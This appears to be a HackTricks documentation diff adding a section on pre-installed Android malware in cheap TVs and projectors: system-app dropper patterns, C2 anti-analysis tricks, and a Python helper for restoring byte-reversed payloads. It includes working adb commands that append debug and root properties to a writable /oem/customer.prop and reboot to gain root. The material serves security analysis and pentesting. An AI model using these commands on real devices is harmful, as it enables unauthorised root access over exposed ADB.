Add content from: Pre-installed C2 Infrastructure and RAT Payload on Android P...

Author: HackTricks News Bot

src/mobile-pentesting/android-app-pentesting/README.md

@@ -127,6 +127,87 @@ Instead of custom sockets, some malware uses **Firebase Cloud Messaging (FCM)**
 
 Native payloads can be delivered as encrypted ELF blobs and decrypted with `CipherInputStream()`, using a key **derived from SHA‑1 of the downloaded filename**. Each filename/version yields a distinct key, hindering static IOC reuse.
 
+### OEM system-app droppers and `customer.prop` root backdoors
+
+Cheap Android TVs/projectors and other OEM devices sometimes ship with **privileged system apps** signed with **AOSP test keys** or an OEM platform key, plus **weak boot-property handling**. Treat these builds as both an Android-app and firmware target: the system app can act as a **dropper**, while insecure OEM partitions can turn **ADB over TCP** into a repeatable root backdoor.
+
+Practical triage:
+- Enumerate risky properties and build traits:
+  ```bash
+  adb shell 'id; getenforce; getprop ro.build.type ro.debuggable ro.secure service.adb.tcp.port ro.build.fingerprint'
+  adb shell 'pm list packages -s -U | grep -Ei "store|ota|update|sdk|silent|service"'
+  adb shell 'pm path <pkg>; dumpsys package <pkg> | sed -n "/grantedPermissions:/,/User 0/p"'
+  ```
+- Check for **writable OEM property files** loaded at boot:
+  ```bash
+  adb shell 'mount | grep " /oem "'
+  adb shell 'ls -l /oem /oem/customer.prop 2>/dev/null'
+  adb shell 'grep -R "customer.prop\\|import /oem\\|load.*prop" /init* /system/etc/init /vendor/etc/init 2>/dev/null'
+  ```
+- If ADB TCP is exposed, review [5555 Android Debug Bridge](../../network-services-pentesting/5555-android-debug-bridge.md) because a writable OEM property file can upgrade an unauthenticated `shell` session into full root after reboot.
+
+Boot-time property injection pattern:
+- If `/oem/customer.prop` is writable and imported during boot, adding:
+  - `ro.debuggable=1`
+  - `service.adb.root=1`
+  - `ro.secure=0`
+- then rebooting can make `adb root` succeed on otherwise production-looking devices:
+
+```bash
+adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop'
+adb shell 'echo "service.adb.root=1" >> /oem/customer.prop'
+adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
+adb reboot && adb wait-for-device && adb root
+adb shell 'id; getenforce'
+```
+
+System-app dropper pattern:
+- A preinstalled package with `sharedUserId=android.uid.system` or powerful permissions such as `INSTALL_PACKAGES`, `WRITE_SECURE_SETTINGS`, `CLEAR_APP_USER_DATA`, or `MANAGE_EXTERNAL_STORAGE` can silently behave as a **manifest-driven dropper**.
+- Typical flow:
+  1. `BootReceiver` or similar autostart component polls a vendor endpoint.
+  2. The server returns JSON metadata such as `pkg`, encrypted `path`, `md5`, `launchType`, `launchParam`, `isShow`, and `reverseLen`.
+  3. The app downloads a disguised payload container (`.bpp`, fake media, encrypted blob).
+  4. A local unpacking routine restores the real APK/DEX.
+  5. Integrity is checked.
+  6. Installation happens with `pm install -r` or PackageManager APIs.
+  7. A service/activity from `launchParam` is started for persistence.
+
+Minimal indicators when reversing this pattern:
+- `Runtime.getRuntime().exec("pm install -r " + filePath)`
+- Boot receivers and exported foreground services with no launcher icon
+- `usesCleartextTraffic=true`, hidden packages (`isShow=false`), and CDN paths derived from device identifiers
+- `sharedUserId=android.uid.system` or platform-signed system APKs inside `/system`, `/product`, `/vendor`, or `/oem`
+
+### C2-controlled anti-analysis for Android payload delivery
+
+OEM droppers sometimes make the network artifact intentionally non-parsable unless you recover a **server-supplied transform parameter** from the C2 manifest.
+
+- **Byte-reversal packer**: the first `reverseLen` bytes of the downloaded file are reversed before verification/install, so the `.bpp` or `.apk` looks corrupt until you undo the same transformation.
+- **AES-CBC path concealment**: the download path/URL can be encrypted in JSON and derived from a device/channel identifier, so intercepted traffic does not immediately reveal the CDN location.
+
+This creates a useful workflow for analysts:
+1. Capture the manifest response over HTTP(S) or instrument the client.
+2. Extract `reverseLen`, `md5`, and the encrypted `path`.
+3. Reproduce any key/IV derivation from `chanId`/channel/build properties.
+4. Decrypt the CDN path.
+5. Undo the byte transformation before feeding the sample to `jadx`, `apktool`, `file`, or DEX parsers.
+
+Minimal byte-reversal restoration logic:
+
+```python
+def restore_prefix_reversal(data: bytes, reverse_len: int) -> bytes:
+    if not reverse_len or reverse_len <= 0:
+        return data
+    offset = len(data) % reverse_len
+    if len(data) - offset < reverse_len:
+        reverse_len = len(data)
+        offset = 0
+    head = data[:offset]
+    middle = data[offset:offset + reverse_len][::-1]
+    tail = data[offset + reverse_len:]
+    return head + middle + tail
+```
+
 ## Jezail rooted Android pentesting toolkit (REST API + web UI)
 
 - Runs on a **rooted device** (Magisk/rootAVD) and starts an **HTTP server on tcp/8080** with a **Flutter web UI** and **REST API**.
@@ -972,5 +1053,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
 - [justapk — multi-source APK downloader with Cloudflare bypass](https://github.com/TheQmaks/justapk)
 - [Jezail rooted Android pentesting toolkit (REST API + Flutter UI)](https://github.com/zahidaz/jezail)
 - [BeatBanker: A dual‑mode Android Trojan](https://securelist.com/beatbanker-miner-and-banker/119121/)
+- [Pre-installed C2 Infrastructure and RAT Payload on Android Projectors](https://github.com/Kavan00/Android-Projector-C2-Malware)
+- [Reverse-engineering pre-installed Android malware with Claude Code](https://zanestjohn.com/blog/reing-with-claude-code)
 
 {{#include ../../banners/hacktricks-training.md}}